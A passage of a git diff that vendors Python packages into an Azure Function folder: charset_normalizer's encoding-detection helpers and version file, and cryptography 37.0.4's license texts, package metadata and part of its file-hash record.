description + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_ascii(character: str) -> bool: + try: + character.encode("ascii") + except UnicodeEncodeError: + return False + return True + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_punctuation(character: str) -> bool: + character_category: str = unicodedata.category(character) + + if "P" in character_category: + return True + + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + return False + + return "Punctuation" in character_range + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_symbol(character: str) -> bool: + character_category: str = unicodedata.category(character) + + if "S" in character_category or "N" in character_category: + return True + + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + return False + + return "Forms" in character_range + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_emoticon(character: str) -> bool: + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + return False + + return "Emoticons" in character_range + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_separator(character: str) -> bool: + if character.isspace() or character in {"|", "+", ",", ";", "<", ">"}: + return True + + character_category: str = unicodedata.category(character) + + return "Z" in character_category + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_case_variable(character: str) -> bool: + return character.islower() != character.isupper() + + +def is_private_use_only(character: str) -> bool: + character_category: str = unicodedata.category(character) + + return character_category == "Co" + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_cjk(character: str) -> bool: + try: + character_name = unicodedata.name(character) + except ValueError: + return False + + return "CJK" in character_name + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_hiragana(character: str) -> bool: + try: + character_name = unicodedata.name(character) + except ValueError: + return False + + return "HIRAGANA" in character_name + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_katakana(character: str) -> bool: + try: + character_name = unicodedata.name(character) + except ValueError: + return False + + return "KATAKANA" in character_name + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_hangul(character: str) -> bool: + try: + character_name = unicodedata.name(character) + except ValueError: + return False + + return "HANGUL" in character_name + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_thai(character: str) -> bool: + try: + character_name = unicodedata.name(character) + except ValueError: + return False + + return "THAI" in character_name + + +@lru_cache(maxsize=len(UNICODE_RANGES_COMBINED)) +def is_unicode_range_secondary(range_name: str) -> bool: + return any(keyword in range_name for keyword in UNICODE_SECONDARY_RANGE_KEYWORD) + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_unprintable(character: str) -> bool: + return ( + character.isspace() is False # includes \n \t \r \v + and character.isprintable() is False + and character != "\x1A" # Why? Its the ASCII substitute character. + and character != b"\xEF\xBB\xBF".decode("utf_8") # bug discovered in Python, + # Zero Width No-Break Space located in Arabic Presentation Forms-B, Unicode 1.1 not acknowledged as space. + ) + + +def any_specified_encoding(sequence: bytes, search_zone: int = 4096) -> Optional[str]: + """ + Extract using ASCII-only decoder any specified encoding in the first n-bytes. + """ + if not isinstance(sequence, bytes): + raise TypeError + + seq_len: int = len(sequence) + + results: List[str] = findall( + RE_POSSIBLE_ENCODING_INDICATION, + sequence[: min(seq_len, search_zone)].decode("ascii", errors="ignore"), + ) + + if len(results) == 0: + return None + + for specified_encoding in results: + specified_encoding = specified_encoding.lower().replace("-", "_") + + for encoding_alias, encoding_iana in aliases.items(): + if encoding_alias == specified_encoding: + return encoding_iana + if encoding_iana == specified_encoding: + return encoding_iana + + return None + + +@lru_cache(maxsize=128) +def is_multi_byte_encoding(name: str) -> bool: + """ + Verify is a specific encoding is a multi byte one based on it IANA name + """ + return name in { + "utf_8", + "utf_8_sig", + "utf_16", + "utf_16_be", + "utf_16_le", + "utf_32", + "utf_32_le", + "utf_32_be", + "utf_7", + } or issubclass( + importlib.import_module("encodings.{}".format(name)).IncrementalDecoder, # type: ignore + MultibyteIncrementalDecoder, + ) + + +def identify_sig_or_bom(sequence: bytes) -> Tuple[Optional[str], bytes]: + """ + Identify and extract SIG/BOM in given sequence. + """ + + for iana_encoding in ENCODING_MARKS: + marks: Union[bytes, List[bytes]] = ENCODING_MARKS[iana_encoding] + + if isinstance(marks, bytes): + marks = [marks] + + for mark in marks: + if sequence.startswith(mark): + return iana_encoding, mark + + return None, b"" + + +def should_strip_sig_or_bom(iana_encoding: str) -> bool: + return iana_encoding not in {"utf_16", "utf_32"} + + +def iana_name(cp_name: str, strict: bool = True) -> str: + cp_name = cp_name.lower().replace("-", "_") + + for encoding_alias, encoding_iana in aliases.items(): + if cp_name in [encoding_alias, encoding_iana]: + return encoding_iana + + if strict: + raise ValueError("Unable to retrieve IANA for '{}'".format(cp_name)) + + return cp_name + + +def range_scan(decoded_sequence: str) -> List[str]: + ranges: Set[str] = set() + + for character in decoded_sequence: + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + continue + + ranges.add(character_range) + + return list(ranges) + + +def cp_similarity(iana_name_a: str, iana_name_b: str) -> float: + + if is_multi_byte_encoding(iana_name_a) or is_multi_byte_encoding(iana_name_b): + return 0.0 + + decoder_a = importlib.import_module("encodings.{}".format(iana_name_a)).IncrementalDecoder # type: ignore + decoder_b = importlib.import_module("encodings.{}".format(iana_name_b)).IncrementalDecoder # type: ignore + + id_a: IncrementalDecoder = decoder_a(errors="ignore") + id_b: IncrementalDecoder = decoder_b(errors="ignore") + + character_match_count: int = 0 + + for i in range(255): + to_be_decoded: bytes = bytes([i]) + if id_a.decode(to_be_decoded) == id_b.decode(to_be_decoded): + character_match_count += 1 + + return character_match_count / 254 + + +def is_cp_similar(iana_name_a: str, iana_name_b: str) -> bool: + """ + Determine if two code page are at least 80% similar. IANA_SUPPORTED_SIMILAR dict was generated using + the function cp_similarity. + """ + return ( + iana_name_a in IANA_SUPPORTED_SIMILAR + and iana_name_b in IANA_SUPPORTED_SIMILAR[iana_name_a] + ) + + +def set_logging_handler( + name: str = "charset_normalizer", + level: int = logging.INFO, + format_string: str = "%(asctime)s | %(levelname)s | %(message)s", +) -> None: + + logger = logging.getLogger(name) + logger.setLevel(level) + + handler = logging.StreamHandler() + handler.setFormatter(logging.Formatter(format_string)) + logger.addHandler(handler) + + +def cut_sequence_chunks( + sequences: bytes, + encoding_iana: str, + offsets: range, + chunk_size: int, + bom_or_sig_available: bool, + strip_sig_or_bom: bool, + sig_payload: bytes, + is_multi_byte_decoder: bool, + decoded_payload: Optional[str] = None, +) -> Generator[str, None, None]: + + if decoded_payload and is_multi_byte_decoder is False: + for i in offsets: + chunk = decoded_payload[i : i + chunk_size] + if not chunk: + break + yield chunk + else: + for i in offsets: + chunk_end = i + chunk_size + if chunk_end > len(sequences) + 8: + continue + + cut_sequence = sequences[i : i + chunk_size] + + if bom_or_sig_available and strip_sig_or_bom is False: + cut_sequence = sig_payload + cut_sequence + + chunk = cut_sequence.decode( + encoding_iana, + errors="ignore" if is_multi_byte_decoder else "strict", + ) + + # multi-byte bad cutting detector and adjustment + # not the cleanest way to perform that fix but clever enough for now. + if is_multi_byte_decoder and i > 0 and sequences[i] >= 0x80: + + chunk_partial_size_chk: int = min(chunk_size, 16) + + if ( + decoded_payload + and chunk[:chunk_partial_size_chk] not in decoded_payload + ): + for j in range(i, i - 4, -1): + cut_sequence = sequences[j:chunk_end] + + if bom_or_sig_available and strip_sig_or_bom is False: + cut_sequence = sig_payload + cut_sequence + + chunk = cut_sequence.decode(encoding_iana, errors="ignore") + + if chunk[:chunk_partial_size_chk] in decoded_payload: + break + + yield chunk diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/version.py new file mode 100644 index 0000000..485f321 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/version.py @@ -0,0 +1,6 @@ +""" +Expose version +""" + +__version__ = "2.1.0" +VERSION = __version__.split(".") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE new file mode 100644 index 0000000..454385e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE @@ -0,0 +1,6 @@ +This software is made available under the terms of *either* of the licenses +found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made +under the terms of *both* these licenses. + +The code used in the OS random engine is derived from CPython, and is licensed +under the terms of the PSF License Agreement. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.APACHE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.APACHE new file mode 100644 index 0000000..a082ed2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.APACHE @@ -0,0 +1,202 @@ + + Apache License + Version 2.0, January 2004 + https://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + https://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.BSD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.BSD new file mode 100644 index 0000000..a1805f9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.BSD @@ -0,0 +1,27 @@ +Copyright (c) Individual contributors. +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + + 1. Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. Neither the name of PyCA Cryptography nor the names of its contributors + may be used to endorse or promote products derived from this software + without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR +ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON +ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.PSF b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.PSF new file mode 100644 index 0000000..08df053 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/LICENSE.PSF @@ -0,0 +1,41 @@ +1. This LICENSE AGREEMENT is between the Python Software Foundation ("PSF"), and + the Individual or Organization ("Licensee") accessing and otherwise using Python + 2.7.12 software in source or binary form and its associated documentation. + +2. Subject to the terms and conditions of this License Agreement, PSF hereby + grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce, + analyze, test, perform and/or display publicly, prepare derivative works, + distribute, and otherwise use Python 2.7.12 alone or in any derivative + version, provided, however, that PSF's License Agreement and PSF's notice of + copyright, i.e., "Copyright © 2001-2016 Python Software Foundation; All Rights + Reserved" are retained in Python 2.7.12 alone or in any derivative version + prepared by Licensee. + +3. In the event Licensee prepares a derivative work that is based on or + incorporates Python 2.7.12 or any part thereof, and wants to make the + derivative work available to others as provided herein, then Licensee hereby + agrees to include in any such work a brief summary of the changes made to Python + 2.7.12. + +4. PSF is making Python 2.7.12 available to Licensee on an "AS IS" basis. + PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF + EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION OR + WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE + USE OF PYTHON 2.7.12 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS. + +5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.12 + FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF + MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.12, OR ANY DERIVATIVE + THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. + +6. This License Agreement will automatically terminate upon a material breach of + its terms and conditions. + +7. Nothing in this License Agreement shall be deemed to create any relationship + of agency, partnership, or joint venture between PSF and Licensee. This License + Agreement does not grant permission to use PSF trademarks or trade name in a + trademark sense to endorse or promote products or services of Licensee, or any + third party. + +8. By copying, installing or otherwise using Python 2.7.12, Licensee agrees + to be bound by the terms and conditions of this License Agreement. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/METADATA new file mode 100644 index 0000000..3c2b01d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/METADATA @@ -0,0 +1,141 @@ +Metadata-Version: 2.1 +Name: cryptography +Version: 37.0.4 +Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers. +Home-page: https://github.com/pyca/cryptography +Author: The Python Cryptographic Authority and individual contributors +Author-email: cryptography-dev@python.org +License: BSD-3-Clause OR Apache-2.0 +Project-URL: Documentation, https://cryptography.io/ +Project-URL: Source, https://github.com/pyca/cryptography/ +Project-URL: Issues, https://github.com/pyca/cryptography/issues +Project-URL: Changelog, https://cryptography.io/en/latest/changelog/ +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Apache Software License +Classifier: License :: OSI Approved :: BSD License +Classifier: Natural Language :: English +Classifier: Operating System :: MacOS :: MacOS X +Classifier: Operating System :: POSIX +Classifier: Operating System :: POSIX :: BSD +Classifier: Operating System :: POSIX :: Linux +Classifier: Operating System :: Microsoft :: Windows +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Security :: Cryptography +Requires-Python: >=3.6 +Description-Content-Type: text/x-rst +License-File: LICENSE +License-File: LICENSE.APACHE +License-File: LICENSE.BSD +License-File: LICENSE.PSF +Requires-Dist: cffi (>=1.12) +Provides-Extra: docs +Requires-Dist: sphinx (!=1.8.0,!=3.1.0,!=3.1.1,>=1.6.5) ; extra == 'docs' +Requires-Dist: sphinx-rtd-theme ; extra == 'docs' +Provides-Extra: docstest +Requires-Dist: pyenchant (>=1.6.11) ; extra == 'docstest' +Requires-Dist: twine (>=1.12.0) ; extra == 'docstest' +Requires-Dist: sphinxcontrib-spelling (>=4.0.1) ; extra == 'docstest' +Provides-Extra: pep8test +Requires-Dist: black ; extra == 'pep8test' +Requires-Dist: flake8 ; extra == 'pep8test' +Requires-Dist: flake8-import-order ; extra == 'pep8test' +Requires-Dist: pep8-naming ; extra == 'pep8test' +Provides-Extra: sdist +Requires-Dist: setuptools-rust (>=0.11.4) ; extra == 'sdist' +Provides-Extra: ssh +Requires-Dist: bcrypt (>=3.1.5) ; extra == 'ssh' +Provides-Extra: test +Requires-Dist: pytest (>=6.2.0) ; extra == 'test' +Requires-Dist: pytest-benchmark ; extra == 'test' +Requires-Dist: pytest-cov ; extra == 'test' +Requires-Dist: pytest-subtests ; extra == 'test' +Requires-Dist: pytest-xdist ; extra == 'test' +Requires-Dist: pretend ; extra == 'test' +Requires-Dist: iso8601 ; extra == 'test' +Requires-Dist: pytz ; extra == 'test' +Requires-Dist: hypothesis (!=3.79.2,>=1.11.4) ; extra == 'test' + +pyca/cryptography +================= + +.. image:: https://img.shields.io/pypi/v/cryptography.svg + :target: https://pypi.org/project/cryptography/ + :alt: Latest Version + +.. image:: https://readthedocs.org/projects/cryptography/badge/?version=latest + :target: https://cryptography.io + :alt: Latest Docs + +.. image:: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main + :target: https://github.com/pyca/cryptography/actions?query=workflow%3ACI+branch%3Amain + +.. image:: https://codecov.io/github/pyca/cryptography/coverage.svg?branch=main + :target: https://codecov.io/github/pyca/cryptography?branch=main + + +``cryptography`` is a package which provides cryptographic recipes and +primitives to Python developers. Our goal is for it to be your "cryptographic +standard library". It supports Python 3.6+ and PyPy3 7.2+. + +``cryptography`` includes both high level recipes and low level interfaces to +common cryptographic algorithms such as symmetric ciphers, message digests, and +key derivation functions. For example, to encrypt something with +``cryptography``'s high level symmetric encryption recipe: + +.. code-block:: pycon + + >>> from cryptography.fernet import Fernet + >>> # Put this somewhere safe! + >>> key = Fernet.generate_key() + >>> f = Fernet(key) + >>> token = f.encrypt(b"A really secret message. Not for prying eyes.") + >>> token + '...' + >>> f.decrypt(token) + 'A really secret message. Not for prying eyes.' + +You can find more information in the `documentation`_. + +You can install ``cryptography`` with: + +.. code-block:: console + + $ pip install cryptography + +For full details see `the installation documentation`_. + +Discussion +~~~~~~~~~~ + +If you run into bugs, you can file them in our `issue tracker`_. + +We maintain a `cryptography-dev`_ mailing list for development discussion. + +You can also join ``#pyca`` on ``irc.libera.chat`` to ask questions or get +involved. + +Security +~~~~~~~~ + +Need to report a security issue? Please consult our `security reporting`_ +documentation. + + +.. _`documentation`: https://cryptography.io/ +.. _`the installation documentation`: https://cryptography.io/en/latest/installation/ +.. _`issue tracker`: https://github.com/pyca/cryptography/issues +.. _`cryptography-dev`: https://mail.python.org/mailman/listinfo/cryptography-dev +.. _`security reporting`: https://cryptography.io/en/latest/security/ + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/RECORD new file mode 100644 index 0000000..4cca709 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/RECORD @@ -0,0 +1,182 @@ +cryptography-37.0.4.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +cryptography-37.0.4.dist-info/LICENSE,sha256=Q9rSzHUqtyHNmp827OcPtTq3cTVR8tPYaU2OjFoG1uI,323 +cryptography-37.0.4.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360 +cryptography-37.0.4.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532 +cryptography-37.0.4.dist-info/LICENSE.PSF,sha256=aT7ApmKzn5laTyUrA6YiKUVHDBtvEsoCkY5O_g32S58,2415 +cryptography-37.0.4.dist-info/METADATA,sha256=Kb2UNR81590eIkVsCic1MfyU25jBTS2b4sTvaivzkT0,5454 +cryptography-37.0.4.dist-info/RECORD,, +cryptography-37.0.4.dist-info/WHEEL,sha256=f3qBETQEkAw2gp_UK66CyyDRJ0NORRrrePJfdEDGBj4,112 +cryptography-37.0.4.dist-info/top_level.txt,sha256=zYbdX67v4JFZPfsaNue7ZV4-mgoRqYCAhMsNgt22LqA,22 +cryptography/__about__.py,sha256=--Ir4xTpXvJIAKXDX9hap3KQf2E9--cHRoaKB-fb_cY,417 +cryptography/__init__.py,sha256=j08JCN_u_m8eL-zxbXRxgsriW6Oe29oSSo_e2hyyasg,748 +cryptography/__pycache__/__about__.cpython-39.pyc,, +cryptography/__pycache__/__init__.cpython-39.pyc,, +cryptography/__pycache__/exceptions.cpython-39.pyc,, +cryptography/__pycache__/fernet.cpython-39.pyc,, +cryptography/__pycache__/utils.cpython-39.pyc,, +cryptography/exceptions.py,sha256=sN_VVTF_LuKMM6R-lIASFFuzAmz1uZ2Qbcdko9WyS64,1471 +cryptography/fernet.py,sha256=W1NZKgmIxX-iMJr6GW-vm-j4BkYACKxHjrq4cbIZMaw,6604 +cryptography/hazmat/__init__.py,sha256=OYlvgprzULzZlsf3yYTsd6VUVyQmpsbHjgJdNnsyRwE,418 +cryptography/hazmat/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/__pycache__/_oid.cpython-39.pyc,, +cryptography/hazmat/_oid.py,sha256=CrOgnohV6ckWZU7ZFUYvgf_Gj8npC7LhJfzBB6wLHYc,15440 +cryptography/hazmat/backends/__init__.py,sha256=bgrjB1SX2vXX-rmfG7A4PqGkq-isqQVXGaZtjWHAgj0,324 +cryptography/hazmat/backends/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__init__.py,sha256=7rpz1Z3eV9vZy_d2iLrwC8Oz0vEruDFrjJlc6W2ZDXA,271 +cryptography/hazmat/backends/openssl/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/aead.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/backend.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/ciphers.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/cmac.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/decode_asn1.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/dh.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/dsa.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/ec.cpython-39.pyc,, 